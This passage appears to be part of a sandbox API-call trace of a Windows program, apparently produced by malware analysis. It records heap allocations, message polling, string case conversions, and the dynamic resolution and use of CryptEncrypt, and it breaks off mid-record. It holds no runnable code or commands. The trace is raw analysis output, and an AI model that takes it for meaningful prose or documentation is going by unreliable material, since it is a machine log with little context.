HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0174.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0174.031] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0174.031] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0174.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0174.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0174.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0174.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0174.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0174.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0174.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0174.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.031] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e90 | out: hHeap=0x2af0000) returned 1 [0174.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.031] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0174.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0174.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0174.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0174.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0174.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0174.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0174.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0174.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0174.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0174.032] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0174.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0174.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0174.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0174.033] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0174.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0174.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0174.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0174.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0174.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0174.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0174.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0174.033] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0174.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0174.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0174.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0174.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0174.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0174.033] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0174.034] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0174.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0174.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0174.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0174.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0174.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0174.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0174.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0174.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0174.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0174.037] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0174.037] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0174.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.037] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0174.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.038] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.038] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.038] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.038] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.038] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaac30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0174.038] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71b98*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71b98*, pdwDataLen=0x8cef60*=0x8) returned 1 [0174.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.039] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: 